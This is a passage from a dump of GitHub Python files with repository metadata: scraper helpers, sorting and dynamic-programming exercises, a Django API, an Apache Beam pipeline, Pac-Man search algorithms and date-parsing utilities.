\"/e\", \"do\", do_file])\n logging.info(\"Result={}\".format(res))\n\n\ndef iniJSONPickle():\n jsonpickle.set_preferred_backend('simplejson')\n jsonpickle.set_encoder_options('simplejson', indent=4, sort_keys=True, ensure_ascii=False)\n\n\ndef readJSONFile(file, fatal_on_not_found=True, default_return=None, fatal_on_decode_error=True):\n try:\n fileh = open(file, 'r', encoding=\"utf-8\")\n except FileNotFoundError:\n if fatal_on_not_found:\n msg = \"File not found '\" + file + \"'\"\n #logging.critical(msg)\n raise Exception(msg)\n else:\n return default_return\n else:\n # logging.debug(cont)\n cont = fileh.read()\n fileh.close()\n try:\n obj = jsonpickle.decode(cont)\n except json.decoder.JSONDecodeError:\n if fatal_on_decode_error:\n logging.critical(\"Decode error in '\" + file + \"'\")\n raise\n else:\n return default_return\n else:\n return obj\n\n\n# filename DOES INCLUDE EXTENSION\ndef saveJSON(data, filename, overwrite=True):\n if not overwrite and os.path.isfile(filename):\n return False\n data_str = jsonpickle.encode(data)\n\n dir = os.path.dirname(filename)\n os.makedirs(dir, exist_ok=True)\n\n with open(filename, 'w', encoding=\"utf-8\") as fileh:\n fileh.write(data_str)\n return True\n\n\ndef myTextStrip(str):\n return str.replace('\\n', '').strip()\n\n\ndef jsonPretty(dict_data):\n return json.dumps(dict_data, sort_keys=True, indent=4, separators=(',', ': '), ensure_ascii=False, cls=DatetimeEncoder)\n","repo_name":"saybinem/crunchbase_webscraper","sub_path":"src/cbscraper/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":9447,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"44100221626","text":"import os\nfrom setuptools import setup\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name='adp',\n version='1.0',\n author='David Gadling',\n author_email='dave@toasterwaffles.com',\n description='A basic tool to download your pay stubs from adp.com',\n license='MIT',\n url='https://github.com/dgadling/adp-scrape',\n long_description=read('README.md'),\n py_modules=['adp'],\n install_requires=[\n 'Click',\n 'requests',\n ],\n entry_points='''\n [console_scripts]\n adp=adp:cli\n '''\n)\n","repo_name":"dgadling/adp-scrape","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7158785183","text":"# 퀵 정렬\narray = [5,7,9,0,3,1,6,2,4,8]\n\ndef quick_sort(array, start, end) :\n if start >= end : # 원소가 1개인 경우\n return\n pivot = start\n left = start + 1\n right = end\n \n while(left <= right) :\n while(left <= end and array[left] <= array[pivot]) : # 좌측에서 피벗 값보다 큰 데이터를 찾는 idx 선형탐색\n left += 1\n \n while(right > start and array[right] >= array[pivot]) : #우측에서 피벗 값보다 작은 데이터를 찾는 idx 선형탐색\n right -=1\n \n if(left >right): # 서로 엇갈렸다면 작은 데이터와 피벗을 교체\n array[right] , array[pivot] = array[pivot], array[right]\n else : # 엇 갈리지 않았다면 작은 데이터와 큰 데이터를 교체\n array[right], array[left] = array[left], array[right]\n \n quick_sort(array, start, right -1)\n quick_sort(array, right+1, end)\n \nquick_sort(array, 0, len(array) - 1)\nprint(array) \n ","repo_name":"rhkdguskim/Study","sub_path":"알고리즘/quicksort/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73926341265","text":"\r\n\r\n# loading the JSON Data into a Python Dictionary\r\n\r\nimport json\r\nfrom difflib import SequenceMatcher, get_close_matches\r\n\r\ndata = json.load(open(\"data.json\"))\r\n\r\n# Returning the definition for a word\r\ndef translate(w):\r\n w = w.lower()\r\n # counting for non-existing words\r\n if w in data:\r\n return data[w]\r\n elif len(get_close_matches(w, data.keys()))>0:\r\n # calculating similarity ratio between two words & making the program suggest a similar word\r\n yn = input(\"Did you mean %s instead? Enter Y if yes , or N if no: \" % get_close_matches(w, data.keys())[0])\r\n if yn == \"Y\":\r\n return data[get_close_matches(w, data.keys())[0]]\r\n elif yn == \"N\":\r\n return \"Word does not exist please doublecheck it. \"\r\n else:\r\n return \"Entry not understood\"\r\n else:\r\n return \"The word does not exist. Please doublecheck it\"\r\n\r\nword = input(\"Enter word: \")\r\n\r\noutput = translate(word)\r\n\r\nif type(output) == list:\r\n for item in output:\r\n print(item)\r\nelse:\r\n print(output)\r\n\r\n\r\n\r\n\r\n","repo_name":"simonkenny-droid/python-beginings","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4241547437","text":"import sys\n\nr = sys.stdin.readline\n\nN = int(r())\n\nwines = [0]+[int(r()) for _ in range(N)]+[0]\ndp = [0] * (N+2)\ndp[1] = wines[1]\ndp[2] = dp[1] + wines[2]\n\nfor i in range(3, N+1):\n dp[i] = max(dp[i-3]+wines[i-1]+wines[i], dp[i-2]+wines[i], dp[i-1])\n\nprint(dp[N])","repo_name":"sanghee-ju/baekjoon","sub_path":"백준/Silver/2156. 포도주 시식/포도주 시식.py","file_name":"포도주 시식.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9006016191","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport seaborn as sns\r\ndf = pd.read_csv(\"Survey-on-Regular-Life-Responses.csv\")\r\n\r\n\r\nplt.title('\\n\\nHaving trouble in all your relationships.\\n')\r\n\r\nprint(df.head())\r\nsns.set_style(\"dark\")\r\nsns.set_palette(\"RdBu\")\r\n#only change the value of X\r\n\r\nax = sns.countplot(x='You are having trouble in all your relationships (home as well as professional).', hue='Gender',data=df)\r\n\r\ntotal = int(1)\r\nfor p in ax.patches:\r\n height = p.get_height()\r\n ax.text(p.get_x()+p.get_width()/2.,\r\n height + 3,\r\n '{:1.2f}'.format(height/total),\r\n ha=\"center\",fontsize=10)\r\nax.set(xlabel=' ', ylabel='Number of people')\r\n\r\n\r\nax.set_ylabel(\"Number of people\")\r\n\r\nax.spines['top'].set_visible(False)\r\nax.spines['right'].set_visible(False)\r\n\r\nplt.legend(loc='upper right')\r\n#plt.xticks(rotation=20)\r\n\r\nplt.show()\r\n\r\n\r\n\r\n","repo_name":"Akash-Ahmed-CSE/Projects","sub_path":"COVID 19 Depression Analysis using Data Visualization/count plot.py","file_name":"count plot.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22437627350","text":"class Solution:\n def maxCoins(self, nums):\n nums, dp = [1] + nums + [1], [[0] * (len(nums) + 2) for _ in range(len(nums) + 2)]\n\n def helper(i, j):\n if dp[i][j] or j - i <= 1:\n return dp[i][j]\n dp[i][j] = max(nums[i] * nums[j] * nums[k] + helper(i, k) + helper(k, j) for k in range(i + 1, j))\n return dp[i][j]\n\n return helper(0, len(nums) - 1)\n\n\nif __name__ == '__main__':\n solution = Solution()\n print(solution.maxCoins([3, 1, 5, 8]))\n","repo_name":"MadSkittles/leetcode","sub_path":"312.py","file_name":"312.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"30335413548","text":"import os\nimport argparse\nimport pandas as pd\nimport numpy as np\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--path', '-path', help='path to experiment folder containing recordings folders', default='C:\\\\Users\\\\user\\\\Documents\\\\Papers\\\\Affect-based\\\\Experiments\\\\il_cur_6.0_02', type=str)\nparser.add_argument('--cov_t', '-cov_t', help='coverage threshold. to cope with too short segments', default=50, type=int)\nargs = parser.parse_args()\n\n# list of all recordings data_folders\ndata_folders = [name for name in os.listdir(args.path) if os.path.isdir(os.path.join(args.path, name))]\ndata_folders = [os.path.join(args.path, f) for f in data_folders]\n\ndurations, coverages = [], []\nduration_sub = 0.0\nfor folder in data_folders:\n # open evaluation file\n eval_txt = pd.read_csv(os.path.join(folder, 'airsim_rec.txt'), sep='\\t')\n\n # read file\n for i in range(0, eval_txt.shape[0], 1):\n\n if i > 0 and float(eval_txt.iloc[i-1][['StartingPoint']]) < float(eval_txt.iloc[i][['StartingPoint']]):\n duration_sub = float(eval_txt.iloc[i][['Duration']])\n\n if (i < eval_txt.shape[0] - 1 and float(eval_txt.iloc[i][['Coverage']]) > float(eval_txt.iloc[i+1][['Coverage']])) or (i == eval_txt.shape[0] - 1):\n # if the given coverage is higher than the threshold\n if float(eval_txt.iloc[i][['Coverage']]) > args.cov_t:\n coverages.append(float(eval_txt.iloc[i][['Coverage']]))\n durations.append(float(eval_txt.iloc[i][['Duration']])-duration_sub)\n\ndurations_mean = np.array(durations).mean()\ncoverages_mean = np.array(coverages).mean()#*10.7639 - constant to convert from m^2 to ft^2\nsessions = np.array(coverages).shape[0]\n\nprint(\"Durations mean: {}. Coverages mean: {}. Sessions: {}.\".format(durations_mean,coverages_mean,sessions))","repo_name":"microsoft/affectbased","sub_path":"evaluation/get_coverage_results.py","file_name":"get_coverage_results.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"44459925815","text":"import coreapi\nimport coreschema\nfrom rest_framework.schemas import AutoSchema\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom django.db.models import Max\nfrom core.models import Gov, Yearref, Govindicator\nfrom api import averages\n\nfrom . import serializers\n\n\nclass GovernmentsView(APIView):\n \"\"\"\n Return a list of all the governments\n \"\"\"\n def get(self, request, format=None):\n query = Gov.objects.all()\n serialize = serializers.GovernmentDetailSerializer(\n query,\n context={'request': request},\n many=True\n )\n return Response(\n {'results': serialize.data}\n )\n\n\nclass GovernmentDetailView(APIView):\n \"\"\"\n Return details about a particular government\n \"\"\"\n schema = AutoSchema(manual_fields=[\n coreapi.Field(\n 'govid',\n required=True,\n location='path',\n schema=coreschema.String(\n description='Unique identifier for a gorvernment'\n )\n ), coreapi.Field(\n 'year',\n required=False,\n location='query',\n schema=coreschema.String(\n description='year'\n )\n ),\n ])\n\n def get(self, request, govid):\n year = request.query_params.get(\n 'year',\n Yearref.objects.latest('yearid').yr\n )\n query = Gov.objects.get(govid=govid)\n serialize = serializers.GovernmentDetailSerializer(\n query,\n context={'request': request}\n )\n population = Govindicator\\\n .objects\\\n .only('iid__name', 'value', 'iid__short_name')\\\n .filter(\n govid=govid,\n iid__parentgid=1116,\n yearid__yr=year\n ).select_related('iid')\n\n household = Govindicator\\\n .objects\\\n .only('iid__name', 'value', 'iid__short_name')\\\n .filter(\n govid=govid,\n iid__parentgid=1119,\n yearid__yr=year\n ).select_related('iid')\n\n pop_density, total_population, area = averages.density(population)\n house_density, _, _ = averages.density(household)\n return Response(\n {'details': serialize.data,\n 'overview': {\n 'Households/km': house_density,\n 'People/km': pop_density,\n 'Population': total_population,\n 'Area': area,\n },\n 'year': year}\n )\n\n\nclass GovernmentIndicatorView(APIView):\n \"\"\"\n Return indicator scores for a particular government\n \"\"\"\n schema = AutoSchema(manual_fields=[\n coreapi.Field(\n 'govid',\n required=True,\n location='path',\n schema=coreschema.String(\n description='Unique identifier for gorvernment'\n )\n ),\n coreapi.Field(\n 'subgroup',\n required=False,\n location='query',\n schema=coreschema.String(\n description='Indicators are placed in certain '\\\n 'grouings, the ids of these groups can be found in '\\\n '/api/v1/groupings'\n )\n ),\n coreapi.Field(\n 'indicator',\n required=False,\n location='query',\n schema=coreschema.String(\n description='List of unique indicator ids'\n )\n ),\n coreapi.Field(\n 'year',\n required=False,\n location='query',\n schema=coreschema.String(\n description='full year eg: 2015'\n )\n )\n ])\n\n def get(self, request, govid, format=None):\n subgroup = request.query_params.get('subgroup', None)\n indicators = request.query_params.get('indicator', None)\n year = request.query_params.get('year', None)\n if not year:\n year_latest = Govindicator\\\n .objects\\\n .aggregate(latest_year=Max('yearid'))\n year = Yearref.objects.get(yearid=year_latest['latest_year']).yr\n if indicators:\n indi = indicators.split(',')\n query = Govindicator.objects.filter(\n govid=govid,\n yearid__yr=year,\n iid__parentgid__in=indi\n ).select_related('iid', 'iid__parentgid')\n elif subgroup:\n query = Govindicator\\\n .objects\\\n .only('value', 'iid__name', 'iid__parentgid__name',\n 'iid__short_name')\\\n .filter(\n govid=govid,\n yearid__yr=year,\n iid__parentgid__parentgid=subgroup,\n )\\\n .select_related('iid', 'iid__parentgid')\n else:\n return Response(\n status=status.HTTP_400_BAD_REQUEST\n )\n\n serialize = serializers.IndicatorValueSerializer(\n query,\n context={'request': request},\n many=True\n )\n\n return Response(\n {\n 'results': serialize.data,\n 'year': year\n }\n )\n","repo_name":"OpenUpSA/salga-barometer-api","sub_path":"api/governments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"910579550","text":"# https://leetcode.com/problems/evaluate-reverse-polish-notation/description/\n\n\nclass Solution:\n def evalRPN(self, tokens: List[str]) -> int:\n\n # space O(n) time O(n)\n\n stack = []\n\n for character in tokens:\n if character == \"+\":\n stack.append(stack.pop() + stack.pop())\n elif character == \"-\":\n val1, val2 = stack.pop(), stack.pop()\n stack.append(val2 - val1)\n elif character == \"*\":\n stack.append(stack.pop() * stack.pop())\n elif character == \"/\":\n val1, val2 = stack.pop(), stack.pop()\n # decimal division:\n # stack.append(val2/val1)\n # but we want to round it to zero like problem statement says so we use the int function to round it to zero \n stack.append(int(val2/val1)) \n else:\n stack.append(int(character))\n \n # return top of stack\n return stack[-1]\n","repo_name":"MadamHippo/Python-leetcode","sub_path":"150-evaluate-reverse-polish-notation.py","file_name":"150-evaluate-reverse-polish-notation.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3749202190","text":"import collections\nfrom typing import List\n\n\nclass Solution:\n def subsum(self, arr: List[int], target: int) -> List[int]:\n pMap = collections.defaultdict(int)\n\n runningSum = 0\n for idx, num in enumerate(arr):\n runningSum += num\n pMap[runningSum] = idx\n\n # check if ans is in map\n delta = runningSum - target\n if delta in pMap:\n return [pMap[delta + 1], idx]\n\n\nif __name__ == '__main__':\n arr = [1, 3, 2, 5, 4]\n s = Solution()\n print(s.subsum(arr, 5))","repo_name":"jprice8/interview-prep","sub_path":"two-pointer/prefix-sum/subarraySum.py","file_name":"subarraySum.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"13195580900","text":"from protFeat.feature_extracter import extract_protein_feature\nimport argparse\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"arguments of feature extracter module\")\n parser.add_argument('--pf', type=str, default=\"aac_pssm\", help='protein feature in POSSUM or iFeature')\n parser.add_argument('--ppid', type=str, default=1, help='the place of protein id in fasta header')\n parser.add_argument('--inpf', type=str, default=\"input_folder\", help='path to fasta file directory')\n parser.add_argument('--fname', type=str, default=\"sample\", help='fasta file name')\n\n args = parser.parse_args()\n\n protein_feature = args.pf\n place_protein_id = int(args.ppid)\n input_folder = args.inpf\n fasta_file_name = args.fname\n\n\n extract_protein_feature(protein_feature, place_protein_id,\n input_folder, fasta_file_name)","repo_name":"gozsari/ProtFeat","sub_path":"src/protFeat_command_line.py","file_name":"protFeat_command_line.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"40050025810","text":"\"\"\"A template to import the default package and parse the arguments\"\"\"\n\n# pytype: skip-file\n\nfrom __future__ import absolute_import\n\nimport argparse\nimport logging\nimport re\n\nfrom past.builtins import unicode\n\nimport apache_beam as beam\nfrom apache_beam.io import ReadFromText\nfrom apache_beam.io import WriteToText\nfrom apache_beam.options.pipeline_options import PipelineOptions\nfrom apache_beam.options.pipeline_options import SetupOptions\n\nclass RegionSplit(beam.DoFn):\n def process(self, element):\n regionid, regionname = element.split(',')\n #return [(regionid, regionname)] # ParDo's need to return a list\n yield (regionid, regionname) # Can also use yield instead of returning a list\n\nfrom apache_beam.options.pipeline_options import PipelineOptions\n\nclass MyPipelineOptions(PipelineOptions):\n @classmethod\n def _add_argparse_args(cls, parser):\n parser.add_argument(\n '--input',\n dest='input',\n help='Input for the pipeline',\n default='gs://dataflowclass1-bucket/regions.csv')\n parser.add_argument(\n '--output',\n dest='output',\n help='Output for the pipeline',\n default = 'gs://dataflowclass1-bucket/regions_output')\n #known_args, pipeline_args = parser.parse_known_args(argv)\n\n\ndef run(argv=None, save_main_session=True):\n \"\"\"Main entry point; defines and runs the wordcount pipeline.\"\"\"\n # We use the save_main_session option because one or more DoFn's in this\n # workflow rely on global context (e.g., a module imported at module level).\n pipeline_options = MyPipelineOptions()\n \n pipeline_options.view_as(SetupOptions).save_main_session = save_main_session\n\n # The pipeline will be run on exiting the with block.\n with beam.Pipeline(options=pipeline_options) as p:\n lines = p | 'Read' >> ReadFromText(known_args.input)\n records = lines | 'Split' >> beam.ParDo(RegionSplit())\n uppercase = records | 'Uppercase' >> beam.Map(lambda x : (int(x[0]), x[1].upper()))\n uppercase | 'Write' >> WriteToText(known_args.output)\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()\n\n\n# using a ParDo and DoFn instead of a Map\nfilename = 'regions.csv'\nwith beam.Pipeline() as p:\n lines = p | 'Read' >> ReadFromText(filename)\n records = lines | 'Split' >> beam.ParDo(RegionSplit())\n records | 'Write' >> WriteToText('regions.out')\n\n\n\n# options = PipelineOptions()\n# google_cloud_options = options.view_as(GoogleCloudOptions)\n# google_cloud_options.project = 'my-project-id'\n# google_cloud_options.job_name = 'myjob'\n# google_cloud_options.staging_location = 'gs://your-bucket-name-here/staging'\n# google_cloud_options.temp_location = 'gs://your-bucket-name-here/temp'\n# options.view_as(StandardOptions).runner = 'DataflowRunner'\n\n","repo_name":"joegagliardo/dataflowclass1","sub_path":"simple3_custom.py","file_name":"simple3_custom.py","file_ext":"py","file_size_in_byte":2773,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"43277218808","text":"import os\nfrom unittest.mock import patch\nfrom config_loader import get_credentials\n\n\ndef mock_load_dotenv_prod():\n os.environ[\"PROD_AWS_ACCESS_KEY_ID\"] = \"test\"\n os.environ[\"PROD_AWS_SECRET_ACCESS_KEY\"] = \"test\"\n os.environ[\"PROD_AWS_REGION\"] = \"test\"\n\n\ndef mock_load_dotenv_dev():\n os.environ[\"DEV_AWS_ACCESS_KEY_ID\"] = \"test\"\n os.environ[\"DEV_AWS_SECRET_ACCESS_KEY\"] = \"test\"\n os.environ[\"DEV_AWS_REGION\"] = \"test\"\n\n\ndef test_get_credentials_production():\n \"\"\"Testing get_credentials in an production environment\"\"\"\n expected = {\n 'AWS_ACCESS_KEY_ID': 'test',\n 'AWS_SECRET_ACCESS_KEY': 'test',\n 'AWS_REGION': 'test'\n }\n with patch('config_loader.load_dotenv', side_effect=mock_load_dotenv_prod):\n\n result = get_credentials(env=\"production\")\n\n assert result == expected\n\n\ndef test_get_credentials_default():\n \"\"\"Testing get_credentials in an development or default environment\"\"\"\n expected = {\n 'AWS_ACCESS_KEY_ID': 'test',\n 'AWS_SECRET_ACCESS_KEY': 'test',\n 'AWS_REGION': 'test'\n }\n with patch('config_loader.load_dotenv', side_effect=mock_load_dotenv_dev):\n\n result = get_credentials()\n\n assert result == expected\n","repo_name":"Sbenaventebravo/AWSDynamo","sub_path":"test_config_loader.py","file_name":"test_config_loader.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12252434764","text":"import random\r\nfrom data_structures import *\r\n\r\n\r\ndef total_distance(curr, target):\r\n '''Returns the total number of tiles between a current entity and a target entity by determining the total steps both horizontal and vertical between them in terms of tiles.\r\n :params curr and target: current entity and target entity as node objects (each entity has a node attribute, for example if clyde and pacman were called they both have a node which they occupy denoted self.node)\r\n It will then return a distance in terms of tiles, keeping in mind each tile is a 16x16 block, so will integer divide by 16.\r\n '''\r\n total_distance = abs(curr.pos.x - target.pos.x) + abs(curr.pos.y - target.pos.y)\r\n return (total_distance // 16)\r\n\r\ndef shuffle_array(array):\r\n random.shuffle(array)\r\n return array\r\n\r\n#GREEDY BFS IS REFERENCED INSIDE GHOST CLASS IN ENTITIES AS OPPOSED A STAND ALONE FUNCTION.\r\n\r\n\r\ndef dls(source, target, limit):\r\n '''\r\n Parameters: node objects source and target, source to begin the search and target to be found. Integer limit determining the\r\n depth of the search.\r\n Return Value: Boolean or array.\r\n Description: An implementation of depth-limited search. Searches through the graph representing the maze by adding adjacent nodes\r\n to a stack iteratively/recursively, these are then added to a visited array. Next nodes to search are popped from the top of the\r\n stack, if they are already in the visited array the algorithm backtracks through the stack to get an unvisited node. If the algorithm\r\n searches through the limit of nodes then it will return the visited array as a path.\r\n Author: Thomas Turner\r\n Creation Date:\r\n '''\r\n s = [source]\r\n visited = []\r\n\r\n while len(s) > 0:\r\n current = s.pop(len(s) - 1)\r\n while current in visited:\r\n current = s.pop(len(s) - 1)\r\n\r\n if current == target:\r\n return visited\r\n\r\n for node in shuffle_array([node for node in current.adjacent_nodes.values()]): # look at all of the adjacent nodes of that node and if they are valid push them to the back of the queue\r\n if node != None: #shuffle_array function randomly shuffles the order of nodes to be entered to the stack, which are all valid dfs searches but increases the search capacity of the ghost(in the sense that it will cover more of the graph as opposed to following the strict order of nodes in adjacent_nodes dict)\r\n s.append(node)\r\n\r\n visited.append(current)\r\n if len(visited) == limit:\r\n return visited\r\n\r\n return False\r\n\r\n\r\ndef bfs(source, target):\r\n q = [source]\r\n came_from = {}\r\n path = []\r\n visited = []\r\n\r\n while len(q) > 0:\r\n current = q.pop(0)\r\n while current in visited:\r\n current = q.pop(0)\r\n\r\n if current == target:\r\n path.append(current)\r\n while current in came_from:\r\n current = came_from[current]\r\n path.append(current)\r\n\r\n return path[::-1]\r\n\r\n for node in current.adjacent_nodes.values():\r\n if node != None:\r\n q.append(node)\r\n came_from[current] = node\r\n\r\n\r\n\r\n\r\n\r\nclass InformedSearch(object):\r\n '''\r\n Return Value:\r\n Description: Higher-level abstraction of important tools used within both Djikstra's algorithm and A* search.\r\n Author: Thomas Turner\r\n Creation Date:\r\n '''\r\n def __init__(self):\r\n '''\r\n Parameters:\r\n Return Value:\r\n Description: constructor method which produces an open set to track nodes to search, produces a dictionary to store all\r\n parents/predecessors of searched nodes so that a path can be returned, and a final path to return.\r\n Author: Thomas Turner\r\n Creation Date:\r\n '''\r\n self.open_set = PriorityQueue()\r\n self.node_history = {}\r\n self.path = []\r\n self.direction_history = []\r\n\r\n def construct_score_table(self, graph):\r\n '''\r\n Parameters: graph object\r\n Return Value: dictionary / hash map\r\n Description: produces a table with the same amount of entries as nodes in the graph and is filled with\r\n an infinity value for initialisation.\r\n Author: Thomas Turner\r\n Creation Date:\r\n '''\r\n score_table = {}\r\n for row in graph:\r\n for node in row:\r\n score_table[node] = float(\"inf\")\r\n\r\n return score_table\r\n\r\n\r\n def get_path(self, current):\r\n '''\r\n Parameters: node object current, the last node explored in the frontier.\r\n Return Value: array\r\n Description: backtracks through the hash map storing the parent of each node searched, this returns a path\r\n in reverse order so the resultant path must be flipped at the end of the procedure.\r\n Author: Thomas Turner\r\n Creation Date:\r\n '''\r\n self.path.append(current)\r\n while current in self.node_history:\r\n current = self.node_history[current]\r\n self.path.append(current)\r\n\r\n path = [[node, direction] for node in self.path[::-1] for direction in self.direction_history[::-1]]\r\n \r\n return path\r\n\r\n\r\n\r\n\r\nclass Astar(InformedSearch):\r\n '''\r\n Parameters: inherits from InformedSearch\r\n Return Value:\r\n Description: Class which encapsulates the A* search algorithm, important tools and implementation.\r\n Author:\r\n Creation Date:\r\n '''\r\n def __init__(self, source, target):\r\n super().__init__()\r\n self.source = source\r\n self.target = target\r\n\r\n @staticmethod\r\n def heuristic1(current, target):\r\n return abs(current.pos.x - target.pos.x) + abs(current.pos.y - target.pos.y)\r\n\r\n @staticmethod\r\n def heuristic2(current, target):\r\n #return Node((current.row - target.row), (current.col - target.col)).pos.magnitude\r\n return Vector(current.col - target.col, current.row - target.row).magnitude_squared()\r\n\r\n\r\n def run(self, graph):\r\n print(self.source, self.target)\r\n g_score, f_score = self.construct_score_table(graph), self.construct_score_table(graph)\r\n g_score[self.source] = 0\r\n f_score[self.source] = self.heuristic2(self.source, self.target)\r\n self.open_set.put([self.source, f_score[self.source]])\r\n\r\n while not self.open_set.is_empty():\r\n current = self.open_set.get()\r\n if current == self.target:\r\n return self.get_path(current)\r\n\r\n for direction, node in current.adjacent_nodes.items():\r\n if node == None:\r\n continue\r\n\r\n else:\r\n if g_score[current] + 1 < g_score[node]:\r\n self.node_history[node] = current\r\n self.direction_history.append(direction)\r\n g_score[node] = g_score[current] + 1\r\n f_score[node] = g_score[current] + 1 + self.heuristic2(node, self.target)\r\n if node not in [i[0] for i in self.open_set.queue]:\r\n self.open_set.put([node, f_score[node]])\r\n\r\n return False\r\n\r\n\r\nclass Djikstra(InformedSearch):\r\n def __init__(self, source, target):\r\n super().__init__()\r\n self.source = source\r\n self.target = target\r\n\r\n\r\n\r\n def traverse(self, player):\r\n last_target = self.target\r\n while True:\r\n print(player.curr_direction)\r\n new_target = self.target.adjacent_nodes[player.curr_direction]\r\n if new_target is None:\r\n break\r\n\r\n else:\r\n new_target = self.target.adjacent_nodes[player.curr_direction]\r\n last_target = new_target\r\n\r\n\r\n return last_target\r\n\r\n\r\n\r\n def run(self, graph, player):\r\n g_score = self.construct_score_table(graph)\r\n g_score[self.source] = 0\r\n self.open_set.put([self.source, g_score[self.source]])\r\n\r\n while not self.open_set.is_empty():\r\n current = self.open_set.get()\r\n if current == self.target:\r\n return self.get_path(current)\r\n\r\n for node in current.adjacent_nodes.values():\r\n if node == None:\r\n continue\r\n\r\n else:\r\n if g_score[current] + 1 < g_score[node]:\r\n self.node_history[node] = current\r\n g_score[node] = g_score[current] + 1\r\n if node not in [i[0] for i in self.open_set.queue]:\r\n self.open_set.put([node, g_score[node]])\r\n\r\n\r\n return False\r\n\r\n","repo_name":"ThomasMTurner/Pacman-Plus","sub_path":"algs.py","file_name":"algs.py","file_ext":"py","file_size_in_byte":8815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71402890066","text":"# -*- coding: utf-8 -*-\n#!/usr/bin/env python\n\nfrom datetime import datetime,timedelta\nimport sys\nimport re\nimport pytz\n\ndef try_read(date, read_fn, **kwargs):\n try:\n output_date = read_fn(str(date), **kwargs)\n except Exception as e:\n raise ValueError(\"Date specified is not correct \" + str(date))\n return output_date\n\ndef date_with_timezone(date, date_format, tz):\n hours = int(tz[1:3])\n minutes = int(tz[3:5])\n mod_date = date.replace(tz, \"\")\n parsed_date = datetime.strptime(mod_date, date_format)\n if(tz[0]==\"+\"):\n return parsed_date - timedelta(hours=hours, minutes=minutes)\n else:\n return parsed_date + timedelta(hours=hours, minutes=minutes)\n\ndef parse_timezoned_date(date, date_format, tz):\n mod_date_format = date_format.replace(\"%z\",\"\")\n if (\"Z\" in date):\n return datetime.strptime(date.replace(\"Z\",\"\"), mod_date_format)\n elif (len(tz) > 0):\n return date_with_timezone(date, mod_date_format, tz[-1][0])\n\ndef custom_strptime(date,date_format):\n tz = re.findall(\"((\\+|-)[0-9]{4})\", date)\n contains_tz = (\"%z\" in date_format and ((\"Z\" in date) or (len(tz) > 0)))\n if(contains_tz and sys.version_info < (3,2,0)):\n return parse_timezoned_date(date, date_format, tz)\n elif(\"%z\" in date_format):\n if (date[-1] == 'Z'):\n # This is done automatically in Python3.7+ but not\n # in lower versions.\n date = date[:-1] + '+0000'\n return datetime.strptime(date, date_format).astimezone(pytz.UTC)\n else:\n return datetime.strptime(date, date_format)\n\ndef read_week_date(weekdate, **kwargs):\n # Input format: 1969W291\n iso_year = int(weekdate.split(\"W\")[0])\n iso_week = int(weekdate.split(\"W\")[1][:2])\n iso_day = int(weekdate.split(\"W\")[1][-1])\n return iso_year, iso_week, iso_day\n\ndef read_iso_week_date_no_day(weekdate, **kwargs):\n # Input format: 1969-W29\n iso_year = int(weekdate[:4])\n iso_week = int(weekdate.split(\"W\")[1][:2])\n return iso_year, iso_week\n\ndef read_iso_week_date(weekdate, **kwargs):\n # Input format: 1969-W29-1Z\n tz = kwargs.get(\"tz\")\n iso_year, iso_week = read_iso_week_date_no_day(weekdate)\n iso_day = int(weekdate.split(\"-\")[-1][0])\n timezone = weekdate.split(\"-\")[-1][1:] if tz else None\n return iso_year, iso_week, iso_day, timezone\n\ndef read_week_date_time(weekdatetime, **kwargs):\n # Input format: 1969W291T173639.592Z\n msecs = kwargs.get(\"msecs\")\n if msecs:\n pattern, reset_hour = \"%H%M%S.%f%z\", \"000000.000Z\"\n else:\n pattern, reset_hour = \"%H%M%S%z\", \"000000Z\"\n (iso_year, iso_week, iso_day) = read_week_date(weekdatetime.split(\"T\")[0])\n time = custom_strptime(weekdatetime.split(\"T\")[1], pattern)\n only_time = time - custom_strptime(reset_hour, pattern)\n return iso_year, iso_week, iso_day, only_time\n\ndef read_hypen_week_date_time(weekdatetime, **kwargs):\n # Input format: 969-W29-1T17:36:39.592Z\n msecs = kwargs.get(\"msecs\")\n if msecs:\n pattern, reset_hour = 